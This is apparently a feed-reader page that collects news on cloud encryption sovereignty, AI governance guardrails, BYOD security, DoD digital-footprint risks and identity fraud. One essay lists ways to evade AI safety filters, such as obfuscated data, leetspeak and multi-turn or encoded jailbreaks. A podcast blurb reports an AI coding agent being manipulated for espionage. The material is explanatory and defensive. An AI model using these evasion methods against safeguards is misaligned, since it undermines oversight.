Reading view

There are new articles available, click to refresh the page.

클라우드 주권만으론 부족하다···공공 부문의 새로운 쟁점은 ‘종단 간 암호화’

데이터의 위치 지정만으로는 더 이상 충분하지 않다는 인식이 확산되고 있다. 정부가 자국 내에 데이터를 보관하더라도 서드파티 서버에 올려두면 실제 주권을 보장하지 못한다는 우려가 커지면서, 규제 당국은 보다 근본적인 조치를 요구하고 있다. 바로 데이터 암호화 키에 대한 통제권이다.

스위스 지방정부 개인정보보호 책임자 협의체인 프리바팀(Privatim)은 최근 결의문을 통해, 민감한 정부 데이터를 다룰 때 기관이 직접 종단 간(E2E) 암호화를 구현하지 않는 한 글로벌 서비스형 소프트웨어(SaaS) 사용을 피해야 한다고 촉구했다. 결의문은 이러한 기준에 미치지 못하는 사례로 마이크로소프트 365를 명시적으로 언급했다.

결의문은 “대다수 SaaS 솔루션은 업체가 평문 데이터에 접근하지 못하도록 보장하는 진정한 종단 간 암호화를 아직 지원하지 않는다. 따라서 SaaS 애플리케이션 사용은 기관의 통제력을 상당히 약화시키는 결과를 초래한다”라고 밝혔다.

분석가들은 이런 통제력 상실이 데이터 주권의 핵심 개념을 훼손한다고 지적했다. 그레이하운드리서치(Greyhound Research) 최고 애널리스트 산치트 비르 고기아는 “클라우드 업체가 법적 절차든 내부 메커니즘이든 어떤 방식으로든 고객 데이터를 복호화할 수 있는 능력을 갖고 있다면, 그 데이터는 더 이상 진정한 의미의 주권을 지닌 것이 아니다”라고 말했다.

고기아는 유럽 국가 전반에서 이와 유사한 의견이 제시되고 있다고 언급했다. 그에 따르면 유럽에서는 독일, 프랑스, 덴마크, 유럽연합 집행위원회 등이 클라우드 업체의 중립성에 대한 신뢰가 약화되고 있다며 경고하거나 조치를 취하고 있다. 그는 “스위스는 다른 유럽 국가들이 암시적으로 언급해온 내용을 명확히 했다. 결의문은 미국 클라우드 법과 해외 감시 위험 때문에 종단 간 암호화가 적용되지 않은 클라우드 솔루션은 민감한 공공 부문 업무에 적합하지 않다고 규정하고 있다”라고 말했다.

암호화와 ‘위치’의 한계

프리바팀은 결의문에서 데이터 위치 규정만으로는 해결할 수 없는 리스크를 지적하면서, 당국이 글로벌 기업의 계약 의무 준수 여부를 검증할 수 있을 정도로 충분한 투명성을 제공받지 못하고 있다고 진단했다. 이런 불투명성이 기술의 실제 구현 방식, 시스템을 변경 관리, 그리고 직원과 하청 업체를 어떻게 감독하는지까지 이어지며, 외부 서비스 제공자가 여러 단계로 얽히는 복잡한 구조로 확대된다고 강조했다.

가트너(Gartner) 수석 애널리스트 아시시 배너지는 데이터가 특정 국가에 저장돼 있어도 미국 클라우드 법처럼 초국가적 적용이 가능한 법률에 따라 외국 정부가 접근할 수 있다고 말했다. 그는 또한 소프트웨어 벤더가 계약 조건을 주기적으로 수정할 수 있어 고객의 통제권이 더 약화된다고 분석했다.

배너지는 “중동과 유럽의 여러 고객이 ‘데이터가 어디에 저장돼 있든, 대부분 미국 기반인 클라우드 업체가 여전히 접근할 수 있다’는 점을 우려하고 있다”라고 말했다.

에베레스트그룹(Everest Group) 수석 애널리스트 프라브죠트 카우르는 스위스의 입장이 기술 주권을 강화하려는 규제 변화 흐름을 더욱 가속한다고 설명했다. 카우르는 “스위스의 기준이 다른 국가보다 엄격한 것은 사실이지만, 결코 특별한 사례는 아니다. 계약이나 절차적 안전장치에 의존하는 시장에서도 기술 주권을 강화하는 방향으로 전환이 빨라지고 있다”라고 언급했다.

프리바팀은 이런 한계를 고려해 모든 공공 부문에서 클라우드 사용 기준을 강화해야 한다고 제시했다. 결의문은 “특히 민감한 개인정보나 법적 비밀 유지 의무가 적용되는 데이터를 다루는 공공기관은 데이터를 직접 암호화하고, 클라우드 업체가 암호 키에 접근할 수 없는 경우에만 글로벌 SaaS 솔루션을 사용해야 한다”라고 밝혔다.

이는 현재의 관행과 확연히 다른 접근이다. 지금까지 많은 정부 기관은 클라우드 업체가 기본으로 제공하는 암호화 기능에 의존해 왔다. 마이크로소프트 365와 같은 서비스는 저장 및 전송 단계에서 암호화를 제공하지만, 운영상 필요나 규제 준수, 법적 요청에 대응하기 위해 마이크로소프트가 데이터를 복호화할 수 있는 권한을 여전히 보유하고 있다.

보안은 강화되지만 통찰력은 감소

다만 전문가들은 고객이 통제하는 종단 간 암호화가 상당한 타협점을 수반한다고 지적했다.

카우르는 “업체가 평문 데이터를 전혀 볼 수 없게 되면, 정부는 검색과 인덱싱 기능 저하, 협업 기능 제한, 자동화된 위협 탐지나 데이터 유출 방지 도구 활용 제약에 직면하게 된다”라고 말했다. 그는 이어 “코파일럿과 같은 AI 기반 생산성 기능도 업체 측 데이터 처리를 전제로 하기 때문에, 엄격한 종단 간 암호화 환경에서는 사실상 활용이 불가능하다”라고 설명했다.

기능적 제약 외에 인프라와 비용 부담도 문제가 될 수 있다. 기관은 자체 키 관리 시스템을 운영해야 하며, 이는 새로운 거버넌스 업무와 인력 수요를 유발한다. 배너지는 대규모 암호화 및 복호화 작업이 추가 하드웨어 자원을 요구하고 지연을 증가시켜 시스템 성능에 영향을 줄 수 있다고 분석했다.

배너지는 “추가 하드웨어가 필요해지고 사용자 경험에서도 지연이 발생할 수 있으며, 전체 솔루션 비용도 더 높아질 수 있다”라고 말했다.

고기아는 이러한 제약으로 인해 대부분의 정부가 전면적인 암호화 대신 단계적 접근 방식을 택할 것이라고 전망했다. 그는 “기밀 문서, 법적 조사 자료, 국가안보 관련 문서 등 고도의 민감 데이터를 별도 테넌트나 주권 환경에 두고 완전한 종단 간 암호화를 적용하는 방식이 현실적인 선택지가 될 것”이라고 말했다. 반면 행정 문서나 시민 서비스 등 폭넓은 공공 업무는 통제된 암호화와 강화된 감사 기능을 적용한 주요 클라우드 플랫폼을 계속 활용할 것으로 보인다고 진단했다.

클라우드 컴퓨팅 역량의 변화

카우르는 스위스의 접근 방식이 국제적으로 확산될 경우, 주요 클라우드 업체가 계약상 또는 지역 보장에 머무르지 못하고 기술 주권을 강화해야 할 것이라고 전망했다. 그는 “변화 조짐은 이미 나타나고 있다. 특히 마이크로소프트가 고객 통제 암호화와 관할권 기반 접근 제한을 강화하는 보다 엄격한 모델을 도입하기 시작했다”라고 말했다.

고기아는 이런 변화가 클라우드 업체가 정부 고객을 대하는 방식을 근본적으로 흔든다고 분석했다. 그는 “데이터센터 위치, 지역 지원, 계약 기반 분리 등을 주요 보증 수단으로 삼았던 기존 정부 클라우드 전략의 상당 부분이 더 이상 유효하지 않게 됐다”라고 말했다. 또한 “클라이언트 측 암호화, 기밀 컴퓨팅, 외부 키 관리는 선택적 기능이 아니라 고규제 시장의 공공 부문 계약에서 반드시 갖춰야 할 기본 요건이 됐다”라고 강조했다.

배너지는 이로 인해 시장 구조도 크게 재편될 수 있다고 전망했다. 그는 주권 문제에 상대적으로 민감하지 않은 상업 고객을 위한 글로벌 클라우드와, 완전한 통제를 요구하는 정부를 위한 프리미엄 주권 클라우드라는 ‘이원화 구조’가 생길 수 있다고 진단했다. 이어 “유럽 등지에서 부상하는 신흥 클라우드 업체와 지역 벤더들이 엄격한 암호화 요건을 충족하는 주권 기반 솔루션을 제공하면서 시장 점유율을 확대할 가능성이 있다”라고 분석했다.

프리바팀의 권고안은 스위스 공공 기관에만 적용되는 지침이지만, 이번 논쟁은 기술 정책을 둘러싼 지정학적 경쟁이 격화하는 상황에서 단순히 데이터 위치를 통제하는 것만으로는 더 이상 규제 당국의 주권 요구를 충족시키기 어렵다는 점을 보여준다.
dl-ciokorea@foundryco.com

End-to-end encryption is next frontline in governments’ data sovereignty war with hyperscalers

Data residency is no longer enough. As governments lose faith that storing data within their borders, but on someone else’s servers, provides real sovereignty, regulators are demanding something more fundamental: control over the encryption keys for their data.

Privatim, a collective of Swiss local government data protection officers, last week called on their employers to avoid the use of international software-as-a-service solutions for sensitive government data unless the agencies themselves implement end-to-end encryption. The resolution specifically cited Microsoft 365 as an example of the kinds of platforms that fall short.

“Most SaaS solutions do not yet offer true end-to-end encryption that would prevent the provider from accessing plaintext data,” said the Swiss data protection officers’ resolution. “The use of SaaS applications therefore entails a significant loss of control.”

Security analysts say this loss of control undermines the very concept of data sovereignty. “When a cloud provider has any ability to decrypt customer data, either through legal process or internal mechanisms, the data is no longer truly sovereign,” said Sanchit Vir Gogia, chief analyst at Greyhound Research.

The Swiss position isn’t isolated, Gogia said. Across Europe, Germany, France, Denmark and the European Commission have each issued warnings or taken action, pointing to a loss of faith in the neutrality of foreign-owned hyperscalers, he said. “Switzerland distinguished itself by stating explicitly what others have implied: that the US CLOUD Act and foreign surveillance risk renders cloud solutions lacking end-to-end encryption unsuitable for high-sensitivity public sector use, according to the resolution.”

Encryption, location, location

Privatim’s resolution identified risks that geographic data residency cannot address. Globally operating companies offer insufficient transparency for authorities to verify compliance with contractual obligations, the group said. This opacity extends to technical implementations, change management, and monitoring of employees and subcontractors who can form long chains of external service providers.

Data stored in one jurisdiction can still be accessed by foreign governments under extraterritorial laws like the US Clarifying Lawful Overseas Use of Data (CLOUD) Act, said Ashish Banerjee, senior principal analyst at Gartner. Software providers can also unilaterally amend contract terms periodically, further reducing customer control, he said.

“Several clients in the Middle East and Europe have raised concerns that, regardless of where their data is stored, it could still be accessed by cloud providers — most of which are US-based,” Banerjee said.

Prabhjyot Kaur, senior analyst at Everest Group, said the Swiss stance accelerates a broader regulatory pivot toward technical sovereignty controls. “While the Swiss position is more stringent than most, it is not an isolated outlier,” she said. “It accelerates a broader regulatory pivot toward technical sovereignty controls, even in markets that still rely on contractual or procedural safeguards today.”

Given these limitations, Privatim called for stricter rules on cloud use at all levels of government: “The use of international SaaS solutions for particularly sensitive personal data or data subject to legal confidentiality obligations by public bodies is only possible if the data is encrypted by the responsible body itself and the cloud provider has no access to the key.”

This represents a departure from current practices, where many government bodies rely on cloud providers’ native encryption features. Services like Microsoft 365 offer encryption at rest and in transit, but Microsoft retains the ability to decrypt that data for operational purposes, compliance requirements, or legal requests.

More security, less insight

Customer-controlled end-to-end encryption comes with significant trade-offs, analysts said.

“When the provider has zero visibility into plaintext, governments would face reduced search and indexing capabilities, limited collaboration features, and restrictions on automated threat detection and data loss prevention tooling,” said Kaur. “AI-driven productivity enhancements like copilots also rely on provider-side processing, which becomes impossible under strict end-to-end encryption.”

Beyond functionality losses, agencies would face significant infrastructure and cost challenges. They would need to operate their own key management systems, introducing governance overhead and staffing needs. Encryption and decryption at scale can impact system performance, as they require additional hardware resources and increase latency, Banerjee said.

“This might require additional hardware resources, increased latency in user interactions, and a more expensive overall solution,” he said.

These constraints mean most governments will likely adopt a tiered approach rather than blanket encryption, said Gogia. “Highly confidential content, including classified documents, legal investigations, and state security dossiers, can be wrapped in true end-to-end encryption and segregated into specialized tenants or sovereign environments,” he said. Broader government operations, including administrative records and citizen services, will continue to use mainstream cloud platforms with controlled encryption and enhanced auditability.

A shift in cloud computing power

If the Swiss approach gains momentum internationally, hyperscalers will need to strengthen technical sovereignty controls rather than relying primarily on contractual or regional assurances, Kaur said. “The required adaptations are already visible, particularly from Microsoft, which has begun rolling out more stringent models around customer-controlled encryption and jurisdictional access restrictions.”

The shift challenges fundamental assumptions in how cloud providers have approached government customers, according to Gogia. “This invalidates large portions of the existing government cloud playbooks that depend on data center residency, regional support, and contractual segmentation as the primary guarantees,” he said. “Client-side encryption, confidential computing, and external key management are no longer optional capabilities but baseline requirements for public sector contracts in high-compliance markets.”

The market dynamics could shift significantly as a result. Banerjee said this could create a two-tier structure: global cloud services for commercial customers less concerned about sovereignty, and premium sovereign clouds for governments demanding full control. “Non-US cloud providers and local vendors — such as emerging players in Europe — could gain market share by delivering sovereign solutions that meet strict encryption requirements,” he said.

Privatim’s recommendations apply specifically to Swiss public bodies and serve as guidance rather than binding policy. But the debate signals that data location alone may no longer satisfy regulators’ sovereignty concerns in an era where geopolitical rivalries are increasingly playing out through technology policy.

Guardrails and governance: A CIO’s blueprint for responsible generative and agentic AI

The promise of generative AI (genAI) and agentic AI is electrifying. From automating complex tasks to unlocking unprecedented creativity, these technologies are poised to redefine your enterprise landscape. But as a CIO, you know that with great power comes great responsibility — and significant risk. The headlines are already filled with cautionary tales of data breaches, biased outputs and compliance nightmares.

The truth is, without robust guardrails and a clear governance framework, the very innovations you champion could become your biggest liabilities. This isn’t about stifling innovation; it’s about channeling it responsibly, ensuring your AI initiatives drive value without compromising security, ethics or trust.

Let’s dive into the critical areas where you must lead the charge.

Guardrails & governance: Why they are necessary, but no longer sufficient for agents

Many in the industry are confusing the function of guardrails and thinking they’re a flimsy substitute for true oversight. This is a critical misconception that must be addressed. Guardrails and governance are not interchangeable; they are two essential parts of a single system of control.

Think of it this way:

  • AI governance is the blueprint and the organization. It’s the framework of policies, roles, committees (like your AI review board) and processes that define what is acceptable, who is accountable and how you will monitor and audit all AI systems across the enterprise. Governance is the strategy and the chain of command.
  • AI guardrails are the physical controls and the rules in the code. These are the technical mechanisms embedded directly into the AI system’s architecture, APIs and interfaces to enforce the governance policies in real-time. Guardrails are the enforcement layer.

While we must distinguish between governance (the overarching policy framework) and guardrails (technical, in-the-moment controls), the reality of agentic AI has revealed a critical flaw: current soft guardrails are failing catastrophically. These controls are often probabilistic, pattern-based or rely on LLM self-evaluation, which is easily bypassed by an agent’s core capabilities: autonomy and composability (the ability to chain tools and models).

Guardrail failure mode Core flaw  CIO takeaway: Why static fails
PII/ModerationPattern Reliance & Shallow FiltersFails when sensitive data is slightly obfuscated (e.g., using “SNN” instead of “SSN”) or harmful content is wrapped in code/leetspeak.
Hallucination/JailbreakCircular Confidence & Probabilistic DefenseRelies on one model to judge another’s truthfulness or intent. The defense is easily manipulated, as the system can be confidently wrong or tricked by multi-turn or encoded attacks.

The agent’s ability to choose an alternate, unguarded path renders simple static checks useless. Your imperative is to move from relying on these flawed, soft defenses to implementing continuous, deterministic control.

The path forward: Implementing continuous control

To address these systemic vulnerabilities, CIOs must take the following actions:

  1. Mandate hard data boundaries: Replace the agent’s probabilistic PII detection with deterministic, non-LLM-based security tools (DLP, tokenization) enforced by your API gateway. This creates an un-bypassable security layer for all data entering or leaving the agent.
  2. Shift to pre-execution governance: Require all agentic deployments to utilize an agent orchestration layer that performs a pre-execution risk assessment on every tool call and decision step. This continuous governance module checks the agent’s compliance before it executes a financial transaction or high-privilege API call.
  3. Ensure forensic traceability: Implement a “Digital Ledger” approach for all agent actions. Every LLM call, parameter passed and reasoning step must be logged sequentially and immutably to allow for forensic reconstruction and accountability.

Data security: Your ‘private-by-default’ AI strategy

The fear of proprietary data leaking into public models is palpable and for good reason. Every piece of intellectual property inadvertently fed into a large language model (LLM) becomes a potential competitive disadvantage. This is where a “private-by-default” strategy becomes non-negotiable for your organization, a necessity widely discussed by KPMG in analyses such as The new rules of data governance in the age of generative AI.

This means you need to consider:

  • Embracing private foundation models: For highly sensitive workloads, investing in or leveraging private foundation models hosted within your secure environment is paramount. This gives you ultimate control over the model, its training data and its outputs.
  • Leveraging retrieval augmented generation (RAG) architectures: RAG is a game-changer. Instead of training a model directly on your entire private dataset, RAG systems allow the AI to retrieve relevant information from your secure, internal knowledge bases and then use a public or private LLM to generate a response. This keeps your sensitive data isolated while still providing contextually rich answers.
  • Robust data anonymization and masking: For any data that must interact with external models, implement stringent anonymization and masking techniques. This minimizes the risk of personally identifiable information (PII) or sensitive business data being exposed.

Your goal isn’t just to prevent data leakage; it’s to build a resilient AI ecosystem that protects your most valuable assets from the ground up.

Explainability & auditability: The imperative for agentic AI

Generative AI creates; agentic AI acts. When an autonomous AI agent is making decisions, executing transactions or interacting with customers, the stakes escalate dramatically. Regulators, auditors and even internal stakeholders will demand to know why an agent took a particular action.

This necessitates a forensic level of explainability and auditability:

  • Comprehensive decision logging: Every single decision, every parameter change, every data point considered by an AI agent must be meticulously logged. This isn’t just about output; it’s about the entire chain of reasoning.
  • Clear audit trails: These logs must be easily accessible, searchable and structured to form a clear, human-readable audit trail. When an auditor asks how an AI agent processed a loan application, you should be able to trace every step, from input to final decision.
    • Agentic AI example: An agent is tasked with automating supplier payments. A key guardrail must be a transaction limit filter that automatically holds any payment over $100,000 for human approval. The corresponding governance policy requires that the log for that agent details the entire sequence of API calls, the exact rule that triggered the hold and the human who provided the override, creating a perfect audit trail.
  • Transparency in agent design: The design and configuration of your AI agents should be documented and version-controlled. Understanding the rules, logic and external integrations an agent uses is crucial for diagnosing issues and ensuring compliance.

Ethical oversight: Nurturing responsible AI

Beyond security and compliance lies the profound ethical dimension of AI. Addressing this requires a proactive, human-centric approach:

  • Establish an AI review board or center of excellence (CoE): This isn’t a suggestion; it’s a necessity. This multidisciplinary group, comprising representatives from legal, ethics, data science and business units, should be the conscience of your AI strategy, aligning with guidance found in resources like The CIO’s guide to AI governance. Their mandate is to:
    • Proactive bias detection: Scrutinize model training data for potential biases before deployment.
    • Fairness in agent design: Review the logic and rules governing AI agents to ensure they don’t inadvertently discriminate or produce unfair results.
    • Ethical guidelines & policies: Develop and enforce clear ethical guidelines for the use and deployment of all AI within the organization.
    • Ethical AI example: A new genAI model is deployed to screen job candidates. A technical guardrail is implemented as an output toxicity filter to block any language the model suggests that could be interpreted as discriminatory. The governance policy dictates that the AI review board must regularly audit the model’s screening outcomes to ensure the overall hiring rate for protected groups remains statistically unbiased.
  • Human-in-the-loop mechanisms: For critical AI-driven decisions, ensure there’s always an opportunity for human review and override.
  • Bias mitigation techniques: Invest in techniques like re-weighting training data and Explainable AI (XAI) tools to understand and reduce bias in your models.

Responsible AI isn’t a checkbox; it’s a continuous journey of introspection, vigilance and commitment.

The CIO’s leadership imperative

The deployment of genAI and agentic AI isn’t just an IT project; it’s a strategic transformation that touches every facet of the enterprise. As the CIO, you are uniquely positioned to lead this charge, not just as a technologist, but as a strategist, risk manager and ethical guardian.

By prioritizing a “private-by-default” data strategy, enforcing rigorous explainability and auditability for autonomous agents and establishing robust ethical oversight, you can unlock the full potential of AI while building an enterprise that is secure, compliant and profoundly responsible. The future of AI is bright, but only if you build it on a foundation of trust and accountability. Make sure your blueprints reflect that.

This article is published as part of the Foundry Expert Contributor Network.
Want to join?

AI Agent Does the Hacking: First Documented AI-Orchestrated Cyber Espionage

By: Tom Eston

In this episode, we discuss the first reported AI-driven cyber espionage campaign, as disclosed by Anthropic. In September 2025, a state-sponsored Chinese actor manipulated the Claude Code tool to target 30 global organizations. We explain how the attack was executed, why it matters, and its implications for cybersecurity. Join the conversation as we examine the […]

The post AI Agent Does the Hacking: First Documented AI-Orchestrated Cyber Espionage appeared first on Shared Security Podcast.

The post AI Agent Does the Hacking: First Documented AI-Orchestrated Cyber Espionage appeared first on Security Boulevard.

💾

私物端末の業務利用が変える働き方の未来―BYODがもたらす光と影

ハイブリッドワーク時代が生んだ「見えないIT資産」の急増

従業員が自分のスマートフォンやパソコンを仕事に使うBYODは、もはや特別な働き方ではなくなった。世界の調査データによれば、すでに半数近くの従業員が何らかの形で私物端末を業務に活用しており、その市場規模は年率15パーセント前後という驚異的な成長を続けている。2030年代前半には数千億ドル規模に達するという予測も出ており、この流れは今後さらに加速することが確実視されている。

興味深いのは、公式にBYODを認めている企業が半数程度にとどまる一方で、実際には8割以上の企業で従業員が私物端末を業務に使用しているという現実だ。つまり、多くの企業では社内ルールが整備される前に、現場レベルで「なし崩し的なBYOD」が広がっているのである。この状況は、従業員の約8割が「仕事用と私用で端末を分けたい」と考えながらも、実際に会社から端末を支給されている人が15パーセント程度にとどまるという調査結果にも表れている。理想と現実のギャップが、BYODの急速な普及を後押ししているのだ。

このような状況が生み出しているのが「シャドーIT」と呼ばれる問題である。IT部門の管理外で使われる私物端末や個人向けクラウドサービス、チャットアプリなどが増加し、企業が把握できないIT資産が急増している。最新の調査では、企業で利用されているクラウドアプリケーションの約4割がIT部門の知らない「シャドーIT」だという衝撃的な結果も報告されている。BYODの普及は、こうした管理の死角を拡大させる要因となっており、企業のIT統制に大きな影響を与えている。

コスト面でのメリットも無視できない。モバイルBYODプログラムを導入することで、従業員一人あたり年間300ドル以上のコスト削減が可能という試算もある。端末の調達コストだけでなく、管理や保守にかかる費用も削減できるため、特に中小企業にとっては魅力的な選択肢となっている。また、従業員側も使い慣れた端末で仕事ができることで、生産性の向上や満足度の改善につながるという声も多い。

セキュリティリスクの深刻化とゼロトラストへの転換

BYODがもたらす利便性の裏側で、セキュリティリスクは急速に深刻化している。複数の調査によれば、ITリーダーの6割前後が「BYODに関する最大の懸念はセキュリティだ」と回答しており、実際に未管理の端末が原因となったマルウェア感染や情報漏えい事案も後を絶たない。特に衝撃的なのは、ランサムウェア被害の9割以上が未管理デバイスを起点に発生しているという報告だ。組織にとって「見えていない端末」が最大の弱点となっているのである。

こうした状況を受けて、世界的には「BYODを禁止するか、ルールを厳格化するか」という議論が再燃している。イギリスでは半数以上の企業が「オフィス内での私物端末利用を禁止することを検討している」という調査結果も出ており、大手通信事業者からは「BYODから完全会社管理端末に切り替えるべきだ」という提言も出されている。しかし現実的には、ビジネスのスピードや人材確保の観点から、柔軟な働き方を完全に捨て去ることは困難だ。

そこで注目を集めているのが、ゼロトラストの考え方を取り入れたBYODの再設計である。ゼロトラストとは、「社内ネットワークだから安全」「会社PCだから信頼できる」といった従来の前提を捨て、端末の所有者や場所に関係なく、すべてのアクセスを継続的に検証し続けるアプローチだ。この考え方に基づいて、モバイルデバイス管理(MDM)や統合エンドポイント管理(UEM)、さらにはAIを組み合わせたエンドポイントセキュリティへの投資が急増している。

具体的な技術的アプローチとしては、端末全体を管理するのではなく、仮想デスクトップやセキュアブラウザ、業務アプリケーションだけをコンテナ化して、企業データと個人データを論理的に分離する手法が広がっている。これにより、端末そのものよりも、ユーザーのIDとアクセス権、アプリケーションごとのデータ保護に重点を置くことが可能になった。従業員の「私物を細かく覗かれたくない」という心理的抵抗にも配慮しやすくなり、より現実的なセキュリティ対策として受け入れられている。

さらに、第三者アクセスの管理も重要なテーマとなっている。委託先やフリーランス、取引先など、従業員以外の関係者も自分の端末から企業のクラウド環境にアクセスするケースが増えており、その管理が大きな課題となっている。2025年のトレンドレポートでも、「第三者アクセスを含めたBYOD管理」が最重要テーマの一つとして挙げられており、企業の境界を越えた包括的なセキュリティ対策が求められている。

持続可能な働き方を実現する「新しいBYOD」の設計

これからの企業がBYODとどう向き合うべきか、世界の議論を見ると明確な方向性が見えてくる。それは「漫然とBYODを続ける時代は終わり、設計し直された新しいBYODに移行する」というものだ。この新しいBYODは、セキュリティとプライバシー、利便性と管理性のバランスを慎重に考慮した、より洗練されたアプローチとなっている。

まず重要なのは、統合エンドポイント管理(UEM)への移行である。スマートフォンやタブレット、ノートPC、さらにはウェアラブルデバイスやIoT機器まで、多様なデバイスを一元管理するUEMは、BYODの拡大とともに急成長している分野だ。最新の市場調査では、MDMが依然として大きなシェアを持つ一方で、UEMが最も高い成長率を示すと予測されている。これにより、デバイスの種類や所有者を問わず、一貫したセキュリティポリシーを適用することが可能になる。

次に、仮想化やコンテナ技術を使った「データ側の防御」への転換が進んでいる。端末を完全に会社管理下に置くのではなく、アプリケーションやワークスペースだけを隔離し、企業データをローカルに残さない設計が重視されている。これにより、端末の紛失や盗難時もリモートで業務環境だけを無効化でき、個人のプライバシーとの両立がしやすくなった。

ポリシーと教育のアップデートも欠かせない要素だ。多くの企業では、勤務時間外の利用や家族との端末共有、個人クラウドへの自動バックアップなど、現代的な使い方を想定したBYODポリシーが整備されていない。また、生成AIツールの利用が広がる中で、私物端末から機密情報をAIサービスに投入してしまうリスクも無視できなくなっている。最新の解説記事では、BYODポリシーを単なる「デバイスルールの一覧」ではなく、「アイデンティティとデータを守るための行動ガイド」として再設計し、従業員との対話を通じて浸透させる必要性が強調されている。

興味深いことに、BYODは環境・サステナビリティの文脈でも語られ始めている。世界の電子廃棄物は2023年時点で約6000万トンに達し、企業が新しい端末を大量に調達し続けることは環境負荷の面でも大きな課題となっている。BYODは端末のライフサイクルを延ばし、調達量を減らすことで、環境負荷を下げる一つの手段になりうるという指摘もある。持続可能な企業経営を目指す上で、BYODは新たな意味を持ち始めているのだ。

日本企業がこれからBYODを検討・見直しする際には、「禁止するか、許可するか」という二択ではなく、「どこまで・何を・誰に」許可するのかという粒度で設計することが重要になる。機密度の高いシステムは会社支給端末と仮想デスクトップを必須にしつつ、一般的なクラウド型グループウェアやチャットはBYODからのアクセスを認めるといった、きめ細かな線引きが求められる。

また、「端末を見る」のではなく「アクセスとデータの流れを見る」仕組みへの投資も不可欠だ。UEMやゼロトラストの考え方、IDベースのアクセス制御を取り入れることで、BYODかどうかにかかわらず一貫したセキュリティレベルを担保できるようになる。そして何より重要なのは、社員とのコミュニケーションである。BYODは単にIT部門の効率の話ではなく、「自分のスマホをどこまで会社に管理されるのか」「仕事とプライベートをどう切り分けるのか」という個人の感覚にも深く関わる問題だ。ポリシー策定の段階から現場の声を取り入れ、目的やリスク、会社がどこまで端末情報にアクセスするのかを丁寧に説明することが、実効性のあるBYOD運用には欠かせない。

BYODは一見すると「便利か危険か」の二者択一のように見えるが、実際には「ルールと技術をどう組み合わせるか」という設計の問題である。ゼロトラストやUEM、仮想化、そしてプライバシー配慮型のポリシーを組み合わせることで、「社員にとっては働きやすく、企業にとっては安全なBYOD」を実現できるかどうかが、これから数年の重要なテーマになっていくだろう。働き方の多様化が不可逆的に進む中で、BYODは避けて通れない課題であると同時に、企業の競争力を左右する重要な要素となっている。

DoD failing to address growing security threats posed by publicly available data

A government watchdog is sounding the alarm about a growing national security threat online. Rather than a traditional cyberattack, however, this one comes from the everyday digital footprints service members and their families leave across the internet. 

A new Government Accountability Office report warns that publicly accessible data — from social media posts and location tracking to Defense Department press releases — can be pieced together by malicious actors to identify military personnel, target their families and disrupt military operations.

According to GAO, while the Pentagon has taken some steps to address the threat, its efforts remain scattered, inconsistent and lack coordination. 

“We found that the department recognized that there were security issues, but they weren’t necessarily well-prepared to respond to them because it was new, because it didn’t necessarily neatly fit into existing organizational structures or policies or doctrines, and that’s a consistent story with the department,” Joe Kirschbaum, director of the defense capabilities and management team at GAO, told Federal News Network. 

To understand the risks posed to DoD personnel and operations that come from the aggregation of publicly accessible digital data, the watchdog conducted its own investigation and built notional threat scenarios showing how that information could be exploited. GAO began by surveying the types of data already available online and also assigned investigators to scour the dark web for information about service members. 

In addition to basic social media posts, investigators found data brokers selling personal and even operational information about DoD personnel and their families — information that can be combined with other publicly available data to build a more complete profile. 

“Once you start putting some of these things together, potentially, you start to see a pattern — whether it’s looking at individuals, whether it’s the individuals linked to military operational units or operations themselves, family members. Nefarious actors can take these things and build them into a profile that could be used for nefarious purposes,” Kirschbaum said. 

One of GAO’s threat scenarios shows how publicly accessible information can expose sensitive military training materials and capabilities. Investigators found that social media posts, online forums and dark-web marketplaces contained everything from military equipment manuals, detailed training materials, and photos of facility and aircraft interiors. When combined, these digital footprints can reveal information about equipment modifications, strategic partnerships or potential vulnerabilities, which can be used to clone products, exploit weaknesses or undermine military operations. 

And while DoD has identified the public accessibility of digital data as a “real and growing threat,” GAO found that DoD’s policies and guidance are narrowly focused on social media and email use rather than the full range of potential risks from aggregated digital footprints. 

For instance, the DoD chief information officer has prohibited the use of personal email or messaging apps for official business involving controlled unclassified information. But that policy doesn’t address the use of personal accounts on personal devices for unofficial tasks involving unclassified information — such as booking travel, accessing military travel orders, or posting on social media — activities that can pose similar risks once aggregated.

In addition, DoD officials acknowledged that current policies and guidance do not fully address the range of risks created by publicly accessible digital information about DoD and its personnel. They said part of the challenge is that the department has limited authority to regulate actions of DoD personnel and contractors outside of an operational environment.

“In general, except for the operation security folks, the answer was they didn’t really consider this kind of publicly available information in their own sphere. It’s not like they didn’t recognize there’s an issue, but it was more like, ‘Oh yeah, that’s a problem. But I think it’s handled in these other areas.’ Almost like passing the buck. They didn’t understand, necessarily, where it was handled. And the answer was, it should probably be handled collectively amidst this entire structure,” Kirschbaum said. 

The officials also said that while they had planned to review current policies and guidance, they “had not collaborated to address digital profile risks because they did not believe the digital profile threat and its associated risks aligned with the Secretary of Defense’s priorities,” including reviving warrior ethos, restoring trust in the military and reestablishing deterrence by defending the homeland. 

“One of our perspectives on this is we know we’re not sure where you would put this topic in terms of those priorities. I mean, this is a pretty clear case where it’s a threat to the stability and efficacy of our military forces. That kind of underlines all priorities — you can’t necessarily defend the homeland with forces that have maybe potential operational security weaknesses. So it would seem to kind of undergird all of those priorities,” Kirschbaum said. 

“We also respect the fact that as the department’s making tough choices, whether it’s concentrations of policy, financial and things of that nature, they do have to figure out the most immediate ways to apply dollars. For example, we’re asking the department to look across all those security disciplines and more thoroughly incorporate these threats in that existing process. The extent they’re going to have to make investments in those, they do have to figure out what needs to be done first and where this fits in,” he added.

GAO issued 12 recommendations to individual components and agency heads, but at its core, Kirschbaum said, is the need for the department to incorporate the threat of publicly available information into its existing structure. 

“In order to do that, we’re asking them to use those existing structures that they do have, like the security enterprise executive committee, as their collaborative mechanism. We want that body to really assess where the department is. And sometimes they’re better able to identify exactly what they need to do, rather than us telling them. We want them to identify what they need to do and conduct those efforts,” he said.

The post DoD failing to address growing security threats posed by publicly available data first appeared on Federal News Network.

© The Associated Press

Signal app on a smartphone is seen on a mobile device screen Tuesday, March 25, 2025, in Chicago. (AP Photo/Kiichiro Sato)

A New Frontline: How Digital Identity Fraud Redefines National Security Threats



DEEP DIVE — From stolen military credentials to AI-generated personas seamlessly breaching critical infrastructure, digital identity fraud is rapidly escalating into a frontline national security threat. This sophisticated form of deception allows adversaries to bypass traditional defenses, making it an increasingly potent weapon.

The 2025 Identity Breach Report, published by AI-driven identity risk firm Constella Intelligence, reveals a staggering increase in the circulation of stolen credentials and synthetic identities. The findings warn that this invisible epidemic, meaning it's harder to detect than traditional malware, or it blends in with legitimate activity, is no longer just a commercial concern—it now poses a serious threat to U.S. national security.

